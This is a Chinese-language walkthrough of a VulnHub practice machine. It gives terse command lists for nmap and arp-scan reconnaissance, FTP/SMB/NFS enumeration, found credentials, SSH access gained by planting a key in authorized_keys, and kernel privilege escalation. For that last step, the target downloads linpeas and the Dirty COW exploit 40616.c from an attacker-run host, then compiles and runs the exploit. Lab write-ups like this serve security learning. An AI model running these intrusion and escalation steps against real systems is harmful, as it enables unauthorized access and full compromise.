前言
vulnhub上还是有很多单靶机的,和正常web思维比较贴合,适合入门感受一下
这次主要是文件服务+内核提权
信息收集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| sudo nmap -sn 192.168.56.0/24 -sn 0
sudo arp-scan -l
sudo nmap -sT --min-rate 10000 -p- 192.168.56.128 -oA nmapscan/ports -sT - -oA
grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',' ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
sudo nmap -sT -sV -sC -O -p$ports 192.168.56.128 -oA nmapscan/detail -sV -sC -O
sudo nmap -sU --top-ports 20 192.168.56.128 -oA nmapscan/udp -sU
sudo nmap --script=vuln -p$ports 192.168.56.128 -oA nmapscan/vuln
|
文件服务渗透
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
| sudo ftp 192.168.56.128 port
binary
get put
sudo smbmap -H 192.168.56.128 -H
sudo smbclient //192.168.56.128/smbdata
get put
cat secure, sshd_config
vim cred1.txt smbuser:chauthtok
showmount -e 192.168.56.128
sudo gobuster dir -u http://192.168.56.128 -x txt,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
-x -w
smbuser:rootroot1
sudo ssh-keygen
put onez3r0.pub authorized_keys
sudo ssh -i onez3r0 [email protected]
|
内核提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
| uname -a export TERM=xterm-color
sudo -l
cat /etc/crontab
find / -perm -u=s -type f 2>/dev/null -perm -u=s -type f 2>/dev/null
cp /usr/share/peass/linpeas/linpeas.sh ./
searchsploit kernel 3.10 Privilege Escalation searchsploit dirty cow searchsploit kernel -m 40616.c -m
vim 40616.c
php -S 0:80
cd /tmp wget http://192.168.56.129/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
wget http://192.168.56.129/40616.c gcc 40616.c -o 40616 -pthread
./40616
|